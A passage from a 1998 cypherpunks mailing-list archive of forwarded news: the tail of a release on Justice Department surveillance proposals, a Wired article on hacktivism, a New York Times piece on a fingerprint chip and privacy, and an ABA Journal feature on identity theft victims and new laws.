                    powers in the closing days of the 105th Congress.
                    Barr obtained the information from a confidential
                    source within federal law enforcement. Among other
                    things, the Department's "wish list" for new authority
                    includes (among others):

                       + A vastly expanded definition of terrorism to
                         include domestic crimes having no relationship to
                         terrorism.
                       + The power to seize commercial transportation
                         assets for federal use.
                       + The ability to commander personnel from other
                         federal agencies without reimbursement.
                       + Expanded wiretap authority to allow "roving"
                         wiretaps, and wiretaps without any court
                         authority.
                       + Enlarged asset forfeiture provisions to allow the
                         FBI to seize personal property in both criminal
                         and civil matters.
                       + The establishment of a permanent "FBI Police
                         Force."
                       + Loosening of Posse Comitatus restrictions to allow
                         more military involvement in domestic law
                         enforcement.
                       + Authority to force telephone and Internet
                         companies to divulge information on their
                         customers.

                    "These requests belong in some bizarre conspiracy
                    novel, not in serious legislative documents being
                    circulated at the top levels of federal law
                    enforcement.  These proposals represent a sneak attack
                    on the most cherished principles of our democracy.  If
                    they become a part of our law, freedom and privacy in
                    America will be permanently and severely diminished,"
                    said Barr.

                    Barr also noted the Department and the FBI are
                    "shopping" this wish list in an effort to get the items
                    placed in a spending measure without hearings or
                    debate.






**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 3 Oct 1998 18:38:55 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Wired News - The Golden Age of Hacktivism
Message-ID: <199810032339.QAA27762@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: Bridget973@aol.com
Subject: IP: Wired News - The Golden Age of Hacktivism
Date: Fri, 2 Oct 1998 21:56:06 EDT
To: ignition-point@majordomo.pobox.com

http://www.wired.com/news/news/politics/story/15129.html


                     The Golden Age of Hacktivism
                     by Niall McKay 

                     4:00 a.m.  22.Sep.98.PDT
                     On the eve of Sweden's general election,
                     Internet saboteurs targeted the Web site
                     of that country's right-wing Moderates
                     political party, defacing pages and
                     establishing links to the homepages of the
                     left-wing party and a pornography site. 

                     But the Scandanavian crack Saturday
                     was not the work of bored juveniles
                     armed with a Unix account, a slice of
                     easily compiled code, and a few hours to
                     kill. It advanced a specific political
                     agenda. 

                     "The future of activism is on the
                     Internet," said Stanton McCandlish,
                     program director of the Electronic Frontier
                     Foundation. "More and more, what is
                     considered an offline issue, such as
                     protesting the treatment of the
                     Zapatistas in Mexico, is being protested
                     on the Net." 

                     In the computer-security community, it's
                     called "hacktivism," a kind of electronic
                     civil disobedience in which activists take
                     direct action by breaking into or
                     protesting with government or corporate
                     computer systems. It's a kind of low-level
                     information warfare, and it's on the rise. 

                     Last week, for example, a group of
                     hackers called X-pilot rewrote the home
                     page of a Mexican government site to
                     protest what they said were instances of
                     government corruption and censorship.
                     The group, which did not reply to several
                     emails, made the claims to the Hacker
                     News Network. The hacktivists were
                     bringing an offline issue into the online
                     world, McClandish said. 

                     The phenomenon is becoming common
                     enough that next month, the longtime
                     computer-security group, the Cult of the
                     Dead Cow will launch the resource site
                     hacktivism.org. The site will host online
                     workshops, demonstrations, and software
                     tools for digital activists. 

                     "We want to provide resources to
                     empower people who want to take part in
                     activism on the Internet," said Oxblood
                     Ruffian, a former United Nations
                     consultant who belongs to the Cult of the
                     Dead Cow. 

                     Oxblood Ruffian's group is no newcomer
                     to hacktivism. They have been working
                     with the Hong Kong Blondes, a
                     near-mythical group of Chinese dissidents
                     that have been infiltrating police and
                     security networks in China in an effort to
                     forewarn political targets of imminent
                     arrests. 

                     In a recent Wired News article, a member
                     of the group said it would target the
                     networks and Web sites of US companies
                     doing business with China. 

                     Other recent hacktivist actions include a
                     wave of attacks in August that drew
                     attention to alleged human rights abuses
                     in Indonesia. In June, attacks on
                     computer systems in India's atomic
                     energy research lab protested that
                     country's nuclear bomb tests. 

                     More recently, on Mexican Independence
                     Day, a US-based group called Electronic
                     Disturbance Theater targeted the Web
                     site of Mexican President Ernesto Zedillo.
                     The action was intended to protest
                     Zedillo's alleged mistreatment of the
                     Zapatista rebels in Chiapas. Nearly 8,000
                     people participated in the digital sit-in,
                     which attempted to overwhelm the
                     Mexican president's Web servers. 

                     "What we are trying to do is to find a
                     place where the public can register their
                     dissatisfaction in cyberspace, so that
                     your everyday [mouse] clicker can
                     participate in a public protest," said EDT
                     co-founder Ricardo. 

                     The apparent increase in hacktivism may
                     be due in part to the growing importance
                     of the Internet as a means of
                     communication. As more people go online,
                     Web sites become high-profile targets. 

                     It also demonstrates that many
                     government sites are fairly easy to crack,
                     said one former member of Milw0rm, the
                     now defunct group that defaced the
                     Indian research lab's Web site. In an
                     interview in Internet Relay Chat, the
                     cracker rattled off a list of vulnerable US
                     government Web sites -- including one
                     hosting an electron particle accelerator
                     and another of a US politician -- and their
                     susceptibility to bugs. 

                     "They don't pay enough for computer
                     people," said the cracker, who goes by
                     the name t3k-9. "You get $50,000 for a
                     $150,000 job." 

                     Some security experts also believe that
                     there is a new generation of crackers
                     emerging. "The rise in political cracking in
                     the past couple of years is because we
                     now have the first generation of kids that
                     have grown up with the Net," John
                     Vranesevich, founder of the computer
                     security Web site AntiOnline. "The first
                     generation of the kids that grew up
                     hacking are now between 25 and 35 --
                     often the most politically active years in
                     peoples' lives." 

                     "When the Cult of the Dead Cow was
                     started in 1984, the average age [of our
                     members] was 14, and they spent their
                     time hacking soda machines," said
                     Oxblood Ruffian. "But the last couple of
                     years has marked a turning point for us.
                     Our members are older, politicized, and
                     extremely technically proficient." 

                     While hacktivists are lining up along one
                     border, police and law enforcement
                     officials are lining up along another. 

                     This year the FBI will establish a cyber
                     warfare center called the National
                     Infrastructure Protection Center. The
                     US$64 million organization will replace the
                     Computer Investigations and
                     Infrastructure Threat Assessment Center
                     and involve the intelligence community
                     and the military. 

                     Allan Paller, director of research for the
                     SANS Institute, said the FBI is staffing
                     the new facility with the government's
                     top security experts. "They are stealing
                     people from good places, including a
                     woman from the Department of Energy
                     who was particularly good," he said in a
                     recent interview. "They are taking brilliant
                     people." 

                     Paller also said that a grassroots effort is
                     under way in Washington to establish a
                     National Intrusion Center, modeled after
                     the Centers for Disease Control. 

                     "There is definitely an increased threat of
                     cyber terrorism," said Stephen Berry,
                     spokesman for the FBI press office in
                     Washington. 

                     As offline protests -- which are protected
                     in the United States by the constitution
                     -- enter the next digital age, the
                     question remains: How will the FBI draw
                     the distinction between relatively benign
                     online political protests and cyber
                     terrorism? 




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 3 Oct 1998 18:38:55 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ISPI Clips 5.12: New Fingerprint Chip - Protection vs. Privacy
Message-ID: <199810032339.QAA27773@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ama-gi ISPI" <offshore@email.msn.com>
Subject: IP: ISPI Clips 5.12: New Fingerprint Chip - Protection vs. Privacy
Date: Sat, 3 Oct 1998 00:34:02 -0700
To: <Undisclosed.Recipients@majordomo.pobox.com>

ISPI Clips 5.12: New Fingerprint Chip - Protection vs. Privacy
News & Info from the Institute for the Study of Privacy Issues (ISPI)
Saturday October 3, 1998
ISPI4Privacy@ama-gi.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This From: The New York Times, September 28, 1998
http://www.nytimes.com


PERSONAL COMPUTING:

Tiny New Chip Could Pit Protection of Property Against Right of Privacy
http://www.nytimes.com/library/tech/98/09/cyber/compcol/29compcol-fixmer.ht
ml

By
ROB FIXMER, rob@nytimes.com


Tom Rowley seems uncomfortable in the role of braggart. A sheepish look
comes over his face when he tells you, "We're going to change the way
people live."

But Rowley's assertion is not to be taken lightly. For one thing, he said
those words once before, in the early 1980's, when the innovation he was
introducing was a concept he called voice mail. For better or worse, he did
change the way we live.

The product that inspires his boast today is a humble-looking chip, about
the size of a postage stamp and no thicker than a nickel. When attached to
a computer, it reads fingerprints with a precision that meets the Federal
Bureau of Investigation's standards for personal identification.

Beginning early next year, consumers will see the fingerprint chip
introduced in notebook computers, then in desktop devices. Every major
manufacturer of computer hardware in the United States is believed to be in
some stage of testing or developing products using the chip. Eventually, it
is all but certain to be embedded in door and car locks, bank cards,
cellular telephones, driver's licenses and the sundry other mundane objects
that identify us as consumers and citizens and give us access to places and
money.

Rowley is the chief executive of Veridicom [ http://www.veridicom.com/ ], a
tiny start-up company in Santa Clara, Calif. He is backed by venture
capital from, among others, the Intel Corporation, which recognizes the
chip's potential to open vast markets in consumer electronics, and Lucent
Technologies, which owns the patents accrued by Bell Laboratories, where
the chip was invented in the early and mid-1980's.

Although the product, known as OpenTouch, is cutting-edge technology, it is
low-tech by silicon standards, making it inexpensive to manufacture in
large numbers. The Korean and Taiwanese companies under contract to produce
it see Veridicom's chip as a way to milk a few more years from old
fabrication plants that have already been fully depreciated and might
otherwise be closed as obsolete.

All of which means that the fingerprint chip, is going to be very
inexpensive -- probably less than $10 per chip within 18 months of its
introduction, and eventually even less, industry experts said. A low price
means that it is almost certain to become far more widely used than voice
mail, whether as OpenTouch, which Veridicom will introduce in November at
the Comdex trade show, or as another company's competing product.

Far less certain is the social and political impact of the fingerprint
chip. It certainly can greatly enhance personal security. But depending on
how it is used, it could have a profound impact on privacy, for better or
worse.

The paranoid will no doubt see in this chip a conspiracy by the Government
or another Orwellian nightmare.

The real threat, though, is not from Big Brother but from a legion of what
a colleague refers to as "little brothers," business interests like
magazine publishers, banks and indemnity companies that want to track our
every move, profile our every passion, anticipate our every need either to
persuade us to part with our money or to assess us as risks for credit or
insurance.

Credible identification cuts two ways when it comes to security and
privacy. The same fingerprint reader that gives us secure access to our
home or car can be used to trace our movements through office buildings,
stores, schools and airports.

That can be good or bad depending on the circumstances and what we are up
to. I may not want anyone to know that I am in Room 1705 of the Acme
Professional Building visiting my lawyer or psychiatrist or heart
specialist or interviewing for a job -- unless the person tracking me is a
fire marshal clearing a burning building.

But if I lose my notebook computer on a flight to Seattle, I want to know
that no one will be able to rifle through my files, because the
manufacturer has frozen the code that reads the fingerprint chip so deeply
in my computer's electronics that no amount of tampering will allow another
person to boot it or to unscramble the data on my hard drive.

On the other hand, without safeguards, the same fingerprint-identified
passport that will be useless to a thief will allow governments around the
world to track my every move.

Perhaps the most ambiguous line between privacy threats and security will
be the use of Veridicom's technology on the Internet. In many ways, it will
be the ultimate "cookie," those files that Web sites place on our hard
drives to identify us, or at least our computers, when we point our
browsers in their direction.

In some ways, this is beneficial. If the fingerprint reader on my computer
serves as a certificate of identification when I buy something on line, the
seller does not know my credit card number or whether I am paying with
credit or cash. The seller may not even know my identity. Veridicom's chip
assures the seller that I am who I claim to be without revealing who I am.

Likewise, when used as an encryption key, the chip will guarantee that no
one can unscramble and read my e-mail or other documents.

But there is a darker side.

Companies are already using cookies to create personal profiles of Internet
users by aggregating every piece of information we surrender on Web sites.
The very kinds of sites we visit reveal a great deal about us to those who
want our money, and when we buy products or enter contests or register to
use a site, we reveal not only who we are but a great deal about how we
live.

At the same time, a study released this summer by the Federal Trade
Commission revealed that most businesses on the Web did not tell visitors
how the information they surrendered would be used. In a few cases, the
study found that companies sold information that they had promised users
would be kept confidential. The Clinton Administration insists that for
now, the infant electronic-commerce industries be allowed to police
themselves in matters of privacy.

That is frightening enough when our cookies give up information dropped on
our treks through cyberspace. When everything we do on line can be tied to
our credit and bank cards, driver's licenses and passports, the extra
security we have gained might well be outweighed by the privacy we have
lost.

Not surprisingly, Tom Rowley spends most of his time these days trumpeting
the potential benefits of his chip, but he does not deny its potential for
mischief. After all, he admits, at times even voice mail "is a real pain."

The social stakes this time around are a lot higher.

PERSONAL COMPUTING is published weekly, on Tuesdays.

Rob Fixmer at rob@nytimes.com welcomes your comments and suggestions.


Copyright 1998 The New York Times Company





--------------------------------NOTICE:------------------------------
ISPI Clips are news & opinion articles on privacy issues from
all points of view; they are clipped from local, national and international
newspapers, journals and magazines, etc. Inclusion as an ISPI Clip
does not necessarily reflect an endorsement of the content or opinion
by ISPI. In compliance with Title 17 U.S.C. section 107, this material is
distributed free without profit or payment for non-profit research
and educational purposes only.
---------------------------------------------------------------------------

ISPI Clips is a FREE e-mail service from the "Institute for the Study
of Privacy Issues" (ISPI). To receive "ISPI Clips" on a regular bases
(up to 3 - 8 clips per day) send the following message  "Please
enter [Your Name] into the ISPI Clips list: [Your e-mail address]" to:
ISPIClips@ama-gi.com  .

The Institute for the Study of Privacy Issues (ISPI) is a small
contributor-funded organization based in Victoria, British Columbia
(Canada). ISPI operates on a not-for-profit basis, accepts no
government funding and takes a global perspective.

ISPI's mandate is to conduct & promote interdisciplinary research
into electronic, personal and  financial privacy with a view toward
helping ordinary people understand the degree of privacy they have
with respect to government, industry and each other and to likewise
inform them about techniques to enhance their privacy.

But, none of this can be accomplished without your kind and
generous financial support. If you value in the ISPI Clips service or if
you are concerned about the erosion of your privacy in general, won't
you please help us continue this important work by becoming an "ISPI
Clips Supporter" or by taking out an institute Membership?

We gratefully accept all contributions:

  Less than $60    ISPI Clips Supporter
          $60 - $99    Primary ISPI Membership (1 year)
      $100 - $300    Senior ISPI Membership (2 years)
More than $300    Executive Council Membership (life)

Your ISPI "membership" contribution entitles you to receive "The ISPI
Privacy Reporter" (our bi-monthly 12 page hard-copy newsletter in
multi-contributor format) for the duration of your membership.

For a contribution form with postal instructions please send the following
message "ISPI Contribution Form" to ISPI4Privacy@ama-gi.com .

We maintain a strict privacy policy. Any information you divulge to ISPI
is kept in strict confidence. It will not be sold, lent or given away to
any third party.
















**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 3 Oct 1998 18:39:02 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ISPI Clips 5.13: Identity Theft is Huge & Growing
Message-ID: <199810032339.QAA27784@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ama-gi ISPI" <offshore@email.msn.com>
Subject: IP: ISPI Clips 5.13: Identity Theft is Huge & Growing
Date: Sat, 3 Oct 1998 00:35:01 -0700
To: <Undisclosed.Recipients@majordomo.pobox.com>

ISPI Clips 5.13: Identity Theft is Huge & Growing
News & Info from the Institute for the Study of Privacy Issues (ISPI)
Saturday October 3, 1998
ISPI4Privacy@ama-gi.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This From: American Bar Association's, ABA Journal, October 1998
http://www.abanet.org

IDENTITY THIEVES
http://www.abanet.org/journal/oct98/10FIDENT.html

        Stealing someone's identity to buy everything from cars to toys
        and leaving the real person's credit rating in ruins may be the
        perfect crime because there is little that can be done to prosecute
        it. Until now.


BY
MICHAEL HIGGINS, higginsm@staff.abanet.org

Sometime in the early 1990s, a con man named Scott Clinton Gilbert visited
a resum and printing shop in Las Vegas. His bill came to $185.30, and he
paid in his usual fashion: He lied.

Gilbert charged his purchase under the name "Robert Hartle." If anyone had
questioned Gilbert's true identity, the scam artist was more than ready. He
had obtained a "Robert Hartle" driver's license, Social Security card--even
a birth certificate.

Gilbert probably didn't think much of that small transaction. Before his
fraud spree was done, he would stick the real Robert Hartle with debts of
more than $110,000, including bills for three pickup trucks, two
motorcycles and a double-wide mobile home.

Gilbert, who later pleaded guilty to related charges, was one of thousands
of criminals who quietly discovered what in an increasingly cashless
society had become almost the perfect crime: identity theft. By posing as
someone else, thieves found, they could steal in a way that left victims
powerless and police uninterested.

"It was a very easy crime," says Ed Mierswinsky, a consumer advocate at
U.S. Public Interest Research Group in Washington, D.C. "Forget
restitution. Consumers couldn't even obtain peace of mind" from seeing the
criminals punished.

Today, identity theft is still a vibrant and growing criminal enterprise,
but its cover has been blown. Federal officials are holding summits and
seminars to alert law enforcement officers to the crime. State legislators
are pushing for tougher criminal penalties.

And this fall, Congress is likely to vote on a bill that would make
identity theft a federal felony, punishable by up to 15 years in prison.
Another bill would give consumers more control over who has access to
personal information, such as Social Security numbers.


A '90s Kind of Crime:

It's hard to say how widespread identity theft is because there is no
standard definition of the crime. But sometime around 1994, the number of
complaints to government, business and consumer groups began to explode.

Last year, identity theft cost consumers and financial institutions some
$745 million, according to the U.S. Secret Service, which has jurisdiction
over many financial crimes. In 1992, about 35,000 people called the credit
reporting agency Trans Union with questions or complaints about identity
theft, the company reports. Last year, calls numbered more than 523,000.

It is the victims themselves who've dragged the crime into the spotlight,
demanding that lawmakers take action.

Among them: an Arizona factory worker who helped initiate the new federal
felony bill. He's a man who first learned about identity theft in 1994,
when a collection agency called to ask why he hadn't paid his printing
bill. He's Robert Hartle.

Hartle, 46, was living with his wife, JoAnn, in Spirit Lake, Iowa, and
working as an inspector at a foundry when he was thrust into identity-theft
hell. The Hartles had been living frugally, with few bills, and made almost
all their purchases in cash.
But when Hartle got the strange call about the Las Vegas printing bill, he
ordered a copy of his credit report. It told a different story, Hartle
says. To the credit reporting agency and anyone who used its information,
Hartle was a free-spending deadbeat.

Luckier than most, Hartle had a lead on the culprit. He knew of a man going
by the name of Carl Lee Lunden who had befriended his mother in Phoenix. In
fact, "Lunden"--later found to be Gilbert--had persuaded the elderly woman,
some 30 years his senior, to marry him, giving him access to Hartle family
information. He had also made what Hartle had assumed was a joke about
working under Hartle's name.

Hartle traveled to Phoenix to present his case to police. That's where he
learned something he found hard to believe. Even if he was right about
"Lunden," the police didn't consider Hartle to be the victim of a crime.

The law enforcement logic was this: Hartle wasn't legally obligated to pay
any of the bills the impostor had run up. Therefore, Hartle wasn't out any
money. If anyone was a victim, it was the bank that issued the credit card.

Never mind that Gilbert had ruined Hartle's credit. Or that the creditors
wouldn't erase the debts without a showing of fraud. Hartle found the
police wouldn't even allow him to file a police report.

"I offered to give [the detective] the evidence, and he refused to take
it," Hartle recalls. "I told him that I was not a lawyer or a police
officer, but I knew that crimes had been committed."

By mid-1994, Hartle was in desperate shape. Gilbert had left Hartle's
mother and fled Arizona, but hadn't stopped using his name. Hartle was
spending $400 a month on phone calls, trying to get creditors off his back
and law enforcement onto Gilbert.

"Our credit was ruined. We couldn't move ahead with our lives. Everything
was on hold," he says. "We couldn't continue to live like this."

In Hartle's case, the con man he was chasing was crafty. Gilbert had moved
to Phoenix from Florida, where he had a criminal record. But identity
thieves don't need to be so devious. All that wouldbe thieves require is a
credit card application and some basic personal information about their
target.

The key piece of information--the victim's Social Security number--is
surprisingly easy to get. It's widely available on credit reports. And it's
often the account number on documents that thieves can steal from their
victims' mail or dig out from their garbage.


Lawyers Can Be Victims, Too:

Mari Frank, a lawyer in Laguna Niguel, Calif., found out firsthand how
easily a scam artist can steal someone's name.

In August 1996, Frank got a call from a bank in Delaware, asking why she
hadn't paid an $11,000 balance on a Toys "R" Us credit card. When Frank
asked where the bank had been sending the billing statements, she got an
address in Ventura, Calif., about 80 miles north of her.

It was Frank's first clue that an identity thief had run up bills of about
$50,000 in her name. "She had gotten a red convertible Mustang that she was
driving around --with my credit," says Frank, now an advocate for tougher
identity theft laws. "She got a driver's license with my name."

The thief in Frank's case was anything but sophisticated. She got Frank's
credit report by saying she was a private investigator. To get the Toys "R"
Us card, Frank says, the woman had simply crossed out her own name on the
application and written in "Mari Frank."

Another victim-turned-advocate is Jessica Grant, who also was shocked to
find out how unprotected she was. Grant, a pension manager in Sun Prairie,
Wis., had always used credit sparingly. But when she and her husband tried
to refinance their home in December 1997, they found that an impostor had
run up about $60,000 worth of debt in Grant's name.

The thief, who lived in Texas, had opened 19 separate accounts. In some
cases, the impostor got credit in Grant's name despite submitting
applications with a residence and employer that didn't match Grant's.

"That's the part of it that just infuriates me," Grant says. "There was
just so much information that could have been--and should have
been--questioned. But it never was."


Dilemma of Enforcement:

Like Hartle, both Frank and Grant found that local police did not consider
them to be victims of crime. Both took their cases to federal law
enforcement--the fbi and U.S. Secret Service--where they found good news
and bad.

Federal law does prohibit the fraudulent misuse of identification, bank
cards and Social Security numbers. 18 U.S.C. 1028, 10 U.S.C. 1028, 42
U.S.C. 408.
But, Frank and Grant both say, federal investigators told them they deal
only with multistate fraud rings and cases worth upward of $200,000. Their
cases didn't qualify.

For the feds, it's a predicament, says James Bauer, a deputy assistant
director in the Secret Service and a proponent of tougher identity theft
laws. For example, Bauer's office is shutting down a fraud ring in which
the thieves used stolen identities to buy cars, then cleverly leveraged
their bounty. The thieves would take the car out of state, sell it, use the
money to make a down payment on a house, then take out second mortgages on
the house.

"Multiply that times the 36 cars that we know about so far, and it amounts
to literally millions of dollars," Bauer says.

But while the feds have struggled to crack those sorts of operations,
relatively small fish like Scott Gilbert have wriggled free.

In theory, the banks that issue the credit cards--the real victims, in the
eyes of local police--could push harder for prosecution.

But according to U.S. Sen. Jon Kyle, R-Ariz., sponsor of the new federal
identity theft bill, banks often have insurance to cover their losses. And
they know their chances of getting any restitution may be slim.

Even if police do investigate, identity theft cases can be expensive to
prosecute, says Donald Grant, a Ventura County, Calif., deputy district
attorney whose office handled Frank's case.

Prosecutors have a strong incentive to work a plea deal because trying the
case means paying to bring in bank employees as witnesses, as well as bank
records from across the country, he says.

They also know judges aren't likely to give jail time to nonviolent
criminals, especially if the dollar amount is relatively small or the
defendant is a first-time offender.

"To prosecute these cases is a godawful pain in the neck," Grant says. If
there's a trial, "We generate a lot of expense to taxpayers, and it's not a
prison case. It's sort of a no-win situation for the victims," he concedes.

And it's identity theft victims who are left trying to explain all this to
creditors and collection agencies, who often suspect the victim of being
the impostor. "I was getting outright, flat-out abusive treatment," says
victim Grant. "I was in a position where I had to prove who I was, when
they never bothered to ask [the thief] to prove who she was."

By the time Hartle and his wife had moved to Phoenix to plead their case
with law enforcement officials, Gilbert had fled. In November 1994, state
police in New Hampshire picked him up on charges of trying to get a fake
driver's license, Hartle says. Out on bail, Gilbert called Hartle and tried
to get him to stop his pursuit. When Hartle refused, Gilbert taunted him.

"He told me ... he wasn't going to quit using my identity until he felt
like stopping," Hartle recalls. When Hartle threatened to track down
Gilbert himself, "He laughed at me, said, 'Go ahead and try it because
nobody's going to convict me.' "

At the time, Hartle recalls, "It was beginning to look like he was right."

But in early 1995, Hartle finally got a break. He had contacted U.S. Sen.
Thomas Harkin, D-Iowa, and asked him to press federal prosecutors to help.
In February 1995, they indicted Gilbert for buying guns under a false name
and misusing a credit card. Gilbert pleaded guilty and was sentenced to 17
months in prison.

But Hartle decided that wasn't enough. He turned to a state representative
in Arizona, who pushed state prosecutors to reconsider Hartle's complaints.
In October 1995, Gilbert pleaded guilty to perjury in state court and was
sentenced to four years in prison.

In total, Gilbert served a little more than three years. Not bad, Hartle
says, "when you consider that when I started this, no one was interested."


Hard to Pin Down:

Despite what their victims go through, it's unusual for an identity thief
to get a sentence as severe as Gilbert's.

Take Mari Frank's case. She was fortunate to find a police supervisor in
Ventura, himself a victim of identity theft, who ordered an investigation.
Police arrested her identity thief in October 1996, Frank says.

But the woman missed her sentencing hearing that December and remained free
until police picked her up on other charges in January 1997.

"She finally did a two-month work furlough program ... staying at a halfway
house," Frank says. The thief drove to the program in the red Mustang she
had bought with Frank's credit.

"Violent crime does take precedence," Frank says. "I understand that. But
the criminals know this is not really taken seriously. There [have] to be
some identity thieves going to jail and doing some real time."

Jessica Grant says she grew frustrated trying to get the Texas state police
to take action. She eventually got help from the Houston police and an
investigator with the Social Security Administration. As of July, the
investigator had confronted a suspect and was preparing to file charges,
Grant says.

But identity theft itself isn't a crime in Texas. "The law that they're
charging her with is the misuse of a Social Security number," Grant says.
"She will probably not get jail time."

All three victims paid a stiff price to clean up their credit records.
Hartle estimates that he spent about $15,000 out of his own pocket during
the ordeal. Grant says she has logged 158 hours, so far, trying to
straighten out creditors. Frank, the lawyer, says she cleaned her credit
record in eight months. But it took 90 letters, 500 hours and more than
$10,000 in out-of-pocket expenses, she says.


Beyond Bad Credit:

For some victims, it gets even worse. Impostors have been known to commit
crimes, then give their fake identity to police when they're arrested.

"We're hearing more and more cases these days where the identity theft
victim is saddled with a criminal record," says Beth Givens, project
director at the Privacy Rights Clearinghouse, a San Diego-based group that
aids identity theft victims. "That's what I call the worst-case scenario."

Some victims may never learn of all the damage that was done, notes Jodie
Bernstein, director of the Bureau of Consumer Protection of the Federal
Trade Commission.

"If your credit history is destroyed, you may not even know if it went to
some potential employer and you didn't get a job," she says. "The victims
we talk to eventually get it sorted out, but at great cost."

Bauer of the Secret Service relates another story: "I know a [thief] out
West who actually died using the victim's name," he says. The victim "had
to get a death certificate undone."

Hartle, Frank and Grant have pushed for reforms that are starting to change
how the nation deals with identity theft.

In Arizona, Hartle contacted his state legislator about making identity
theft a serious crime that local police couldn't ignore. In July 1996, the
state made it a felony--the first law of its kind in the nation.

In California, Frank joined victims testifying last year on behalf of a
bill that made identity theft a misdemeanor. As of July, she had testified
eight more times in support of other identity theft measures, including one
bill that would make it a felony in some circumstances.

Frank, who works primarily as a mediator, also has written a book, From
Victim to Victor: A Step-By-Step Guide for Ending the Nightmare of Identity
Theft. And she has assembled a self-help kit and created a Web site,
http://www.identitytheft.org , to assist victims.

Frank says that because identity theft is so new, some lawyers misadvise
clients. She has heard of lawyers counseling victims to change their Social
Security number or declare bankruptcy, two strategies she says are
counterproductive because they ultimately burden the victim with even more
legal difficulties.

Grant, lobbying in Wisconsin, got the quickest legislative action. In
February, two months after she discovered she was a victim, Grant was the
subject of a front-page article in the Wisconsin State Journal.

State Rep. Marlin Schneider, an outspoken privacy hawk, introduced a bill
in her name making identity theft a felony there. Grant visited the
Wisconsin Capitol and talked to legislators, including one trip in March
with a local TV-news camera crew in tow.

The bill passed in April. When Gov. Tommy Thompson signed it into law,
Grant got to keep the pen.

And Hartle--four years after his first, confusing phone call about a
$185.30 printing bill--hopes that this fall he will become one of the few
victim-advocates to push through the same law at both the state and federal
levels.

With prodding from Hartle, Kyle, a member of the Senate Judiciary
Committee, introduced the Identity Theft and Assumption Deterrence Act last
year. The act makes identity theft that crosses state lines a federal
felony, punishable by up to 15 years in prison. It also allows restitution
to victims.

The larger war over who has control over personal information is one that
will be fought well into the next century.

Many issues are just now being identified. The financial and credit
industries certainly have their share of political muscle. But don't count
out those mistreated by the system--the Hartles, Franks and Grants.

"They have lived through the Orwellian nightmare," consumer advocate
Mierswinsky says. "The victims of identity theft are a force to be reckoned
with."


VICTIMS WORK TO KEEP PERSONAL DATA PRIVATE

Although they've been the driving force behind identity theft laws in
several states, the victims of this scam say what they've accomplished
isn't nearly enough. Along with consumer groups, they're pushing for
tougher restrictions on how businesses use personal information.

High on their wish list: a bill introduced by U.S. Sen. Dianne Feinstein,
D-Calif., that would force businesses to get a person's consent before
selling Social Security numbers and other personal data commonly found on
credit reports.

Consumer advocates blame banks and credit card companies for issuing
preapproved credit applications and then not screening carefully enough for
impostor applicants. They say merchants add to the problem by hawking
"instant credit" cards at the checkout counter.

"The lack of verification at that level is astounding," says Ed
Mierswinsky, a consumer advocate at U.S. Public Interest Research Group in
Washington, D.C.

The credit reporting industry says it, too, is concerned about identity
theft. Staffing has been increased on fraud hotlines, and sophisticated
software is being put to use to detect spending patterns that may indicate
fraud.

Visa suffered $470 million in fraud losses in the United States last year,
but only 4 percent was due to identity theft, says Dennis Brosan, Visa's
vice president of fraud control in McLean, Va. That's down 12 percent from
just a few years ago.

But the credit reporting industry opposes restrictions on selling personal
information. Officials say the information actually helps prevent identity
theft because it makes it easier for banks and merchants to confirm whether
people applying for credit are who they say they are. The data also
accounts for tens of millions of dollars in annual sales for credit
reporting agencies, the U.S. General Accounting Office reported in March.

For lenders, there's a tension between serving customers who want tight
security and those who bristle at being asked for three pieces of
identification for every transaction.

"All we can do is hope that the companies that have this ability to
minimize the threat are doing everything they can," says Robert McKew,
general counsel for American Financial Services Association, a trade group
in Washington, D.C., whose members include many lenders. "I believe that
they are."

U.S. Sen. Jon Kyle, R-Ariz., sponsor of a new federal identity theft bill,
says he is reluctant to blame lenders.

"They're dealing with a lot of deadbeats, frankly, and everybody has a
story," Kyle says. "It's very, very hard in today's world. In order to get
credit you've got to give information. And once that information is in the
commercial stream, it's very difficult to protect it."


Michael Higgins, a lawyer, is a reporter for the aba Journal. His e-mail
address is higginsm@staff.abanet.org.

Copyright American Bar Association.

American Bar Association 750 N. Lake Shore Dr., Chicago, IL 60611
312/988-5000 info@abanet.org

--------------------------------NOTICE:------------------------------
ISPI Clips are news & opinion articles on privacy issues from
all points of view; they are clipped from local, national and international
newspapers, journals and magazines, etc. Inclusion as an ISPI Clip
does not necessarily reflect an endorsement of the content or opinion
by ISPI. In compliance with Title 17 U.S.C. section 107, this material is
distributed free without profit or payment for non-profit research
and educational purposes only.
---------------------------------------------------------------------------

ISPI Clips is a FREE e-mail service from the "Institute for the Study
of Privacy Issues" (ISPI). To receive "ISPI Clips" on a regular bases
(up to 3 - 8 clips per day) send the following message  "Please
enter [Your Name] into the ISPI Clips list: [Your e-mail address]" to:
ISPIClips@ama-gi.com  .

The Institute for the Study of Privacy Issues (ISPI) is a small
contributor-funded organization based in Victoria, British Columbia
(Canada). ISPI operates on a not-for-profit basis, accepts no
government funding and takes a global perspective.

ISPI's mandate is to conduct & promote interdisciplinary research
into electronic, personal and  financial privacy with a view toward
helping ordinary people understand the degree of privacy they have
with respect to government, industry and each other and to likewise
inform them about techniques to enhance their privacy.

But, none of this can be accomplished without your kind and
